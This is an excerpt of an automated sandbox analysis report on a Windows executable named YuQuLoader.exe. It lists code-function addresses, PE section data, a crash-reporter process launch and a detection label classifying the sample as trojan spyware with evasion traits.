                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004286A02_2_004286A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040E7002_2_0040E700
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042B71C2_2_0042B71C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041D7D22_2_0041D7D2
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00443F902_2_00443F90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00411F952_2_00411F95
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004010402_2_00401040
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041F04F2_2_0041F04F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004290502_2_00429050
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B0602_2_0044B060
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043D0642_2_0043D064
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042D0702_2_0042D070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043F0102_2_0043F010
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004020D02_2_004020D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043D8E22_2_0043D8E2
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041B9402_2_0041B940
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041794C2_2_0041794C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004201502_2_00420150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B1502_2_0044B150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040D9702_2_0040D970
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042190C2_2_0042190C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044C1C02_2_0044C1C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004491D42_2_004491D4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B9E02_2_0044B9E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004399F62_2_004399F6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004419802_2_00441980
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043718B2_2_0043718B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004311892_2_00431189
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004171A42_2_004171A4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042D2012_2_0042D201
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040A2102_2_0040A210
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00424A102_2_00424A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00427A202_2_00427A20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043EA202_2_0043EA20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00408A302_2_00408A30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004422322_2_00442232
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042E7B42_2_0042E7B4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004482F02_2_004482F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B2F02_2_0044B2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044AAFB2_2_0044AAFB
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00445A982_2_00445A98
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00430AAB2_2_00430AAB
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004263402_2_00426340
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00402B002_2_00402B00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042BB042_2_0042BB04
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042F31B2_2_0042F31B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043C3202_2_0043C320
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042FB332_2_0042FB33
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043233F2_2_0043233F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004133C42_2_004133C4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004433E02_2_004433E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B3802_2_0044B380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040BC102_2_0040BC10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B4102_2_0044B410
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00444C102_2_00444C10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004094302_2_00409430
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044C4C02_2_0044C4C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041255F2_2_0041255F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040DD742_2_0040DD74
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004035002_2_00403500
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00407D202_2_00407D20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004255202_2_00425520
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004215302_2_00421530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00432DC02_2_00432DC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040C5E02_2_0040C5E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043A58C2_2_0043A58C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00424D902_2_00424D90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040CDB02_2_0040CDB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004436402_2_00443640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004456402_2_00445640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00430E4F2_2_00430E4F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041366E2_2_0041366E
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00431E702_2_00431E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043AE042_2_0043AE04
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041E6182_2_0041E618
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437E232_2_00437E23
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042EEC02_2_0042EEC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00426EC12_2_00426EC1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041C6C42_2_0041C6C4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00403EA02_2_00403EA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00408EA02_2_00408EA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004366A02_2_004366A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041F6A92_2_0041F6A9
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437EB02_2_00437EB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043774D2_2_0043774D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004297502_2_00429750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00444F502_2_00444F50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004027602_2_00402760
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004387702_2_00438770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437F172_2_00437F17
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043671D2_2_0043671D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042F72E2_2_0042F72E
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00413FC02_2_00413FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004257C02_2_004257C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004207F82_2_004207F8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004047822_2_00404782
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00406F862_2_00406F86
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040EFAC2_2_0040EFAC
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041DFB12_2_0041DFB1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042E7B42_2_0042E7B4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9C0A02_2_00A9C0A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A960A02_2_00A960A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC58A02_2_00AC58A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC68A02_2_00AC68A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE28A02_2_00AE28A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF78A02_2_00AF78A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD8E02_2_00AAD8E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC98F02_2_00AC98F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD18F02_2_00AD18F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF88F02_2_00AF88F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAE0D02_2_00AAE0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED0D02_2_00AED0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA80202_2_00AA8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB80202_2_00AB8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE90302_2_00AE9030
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA48102_2_00AA4810
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACA8162_2_00ACA816
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B150722_2_00B15072
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A998602_2_00A99860
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9D8702_2_00A9D870
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD0702_2_00AAD070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA00702_2_00AA0070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACE0502_2_00ACE050
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA79802_2_00AA7980
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD21952_2_00AD2195
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9E9E02_2_00A9E9E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B131F82_2_00B131F8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE59E02_2_00AE59E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED9C02_2_00AED9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA9C02_2_00AFA9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA51302_2_00AA5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC51302_2_00AC5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADC9102_2_00ADC910
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB71602_2_00AB7160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACD1602_2_00ACD160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA29402_2_00AA2940
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD01402_2_00AD0140
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACC1502_2_00ACC150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A99AA02_2_00A99AA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABEAB12_2_00ABEAB1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABD2B02_2_00ABD2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADC2B02_2_00ADC2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97A802_2_00A97A80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A972802_2_00A97280
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF4A802_2_00AF4A80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC82902_2_00AC8290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEC2902_2_00AEC290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAF2F02_2_00AAF2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAA2F02_2_00AAA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABA2F02_2_00ABA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC4AF02_2_00AC4AF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB6A202_2_00AB6A20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADEA202_2_00ADEA20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA0A102_2_00AA0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB0A102_2_00AB0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF0A102_2_00AF0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE72602_2_00AE7260
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAFA402_2_00AAFA40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB4A402_2_00AB4A40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC72402_2_00AC7240
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA72502_2_00AA7250
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB2BA02_2_00AB2BA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADD3A02_2_00ADD3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9C3B02_2_00A9C3B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A98BB02_2_00A98BB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED3B02_2_00AED3B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA23802_2_00AA2380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABC3802_2_00ABC380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB03802_2_00AB0380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACFB802_2_00ACFB80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEB3802_2_00AEB380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF5B802_2_00AF5B80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFD3E82_2_00AFD3E8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9ABC02_2_00A9ABC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB93D02_2_00AB93D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC5BD02_2_00AC5BD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA3B202_2_00AA3B20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB13302_2_00AB1330
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABFB302_2_00ABFB30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE93302_2_00AE9330
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD4B002_2_00AD4B00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA3002_2_00AFA300
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAEB102_2_00AAEB10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC53602_2_00AC5360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF03602_2_00AF0360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD3402_2_00AAD340
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB5B402_2_00AB5B40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC23502_2_00AC2350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD3B502_2_00AD3B50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE43502_2_00AE4350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9FCA02_2_00A9FCA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD04B02_2_00AD04B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEACB02_2_00AEACB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEE4802_2_00AEE480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF24802_2_00AF2480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE8C902_2_00AE8C90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AACCE02_2_00AACCE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB34E02_2_00AB34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC34E02_2_00AC34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9A4F02_2_00A9A4F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA1CF02_2_00AA1CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD4CF02_2_00AD4CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE04F02_2_00AE04F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC1CC02_2_00AC1CC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACBC202_2_00ACBC20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE6C202_2_00AE6C20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC44302_2_00AC4430
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA44002_2_00AA4400
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE9C002_2_00AE9C00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD6C102_2_00AD6C10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC9C702_2_00AC9C70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA9DA02_2_00AA9DA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A975B02_2_00A975B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B01DAA2_2_00B01DAA
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB05902_2_00AB0590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA5902_2_00AFA590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA2DE02_2_00AA2DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE5DE02_2_00AE5DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF85E02_2_00AF85E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A985F02_2_00A985F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9E5C02_2_00A9E5C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA25302_2_00AA2530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B07D102_2_00B07D10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A94D602_2_00A94D60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA65602_2_00AA6560
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9BD402_2_00A9BD40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB45402_2_00AB4540
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF7D402_2_00AF7D40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB6D502_2_00AB6D50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABEE812_2_00ABEE81
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE2E802_2_00AE2E80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A96E902_2_00A96E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF3E902_2_00AF3E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9CEE02_2_00A9CEE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A936F02_2_00A936F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD26F02_2_00AD26F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC3ED02_2_00AC3ED0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB5E202_2_00AB5E20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC76302_2_00AC7630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC7E302_2_00AC7E30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF46302_2_00AF4630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97E002_2_00A97E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA06002_2_00AA0600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABC6002_2_00ABC600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB3E002_2_00AB3E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF4E682_2_00AF4E68
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC5E702_2_00AC5E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE8E402_2_00AE8E40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF06402_2_00AF0640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADA6502_2_00ADA650
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACA7A02_2_00ACA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE87A02_2_00AE87A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEA7A02_2_00AEA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA57B02_2_00AA57B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEB7B02_2_00AEB7B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA1F802_2_00AA1F80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABA7902_2_00ABA790
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB97E02_2_00AB97E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABCFE02_2_00ABCFE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE37E02_2_00AE37E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAFFC02_2_00AAFFC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC7FC02_2_00AC7FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A947D02_2_00A947D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAF7D02_2_00AAF7D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB3FD02_2_00AB3FD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD37202_2_00AD3720
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAC7302_2_00AAC730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACE7302_2_00ACE730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE47302_2_00AE4730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE9F002_2_00AE9F00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE57002_2_00AE5700
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9AF102_2_00A9AF10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97F102_2_00A97F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACB7102_2_00ACB710
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD5F102_2_00AD5F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE3F602_2_00AE3F60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB47702_2_00AB4770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEE7702_2_00AEE770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9F7502_2_00A9F750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEF7502_2_00AEF750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEFF502_2_00AEFF50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: String function: 0041B930 appears 104 times
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: String function: 00B05B5C appears 38 times
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: String function: 00AFD8F0 appears 88 times
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: String function: 00B0A904 appears 32 times
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: String function: 0040B230 appears 40 times
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
                Source: YuQuLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: YuQuLoader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003241237482117
                Source: YuQuLoader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003241237482117
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@4/3
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00443F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00443F90
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8616:120:WilError_03
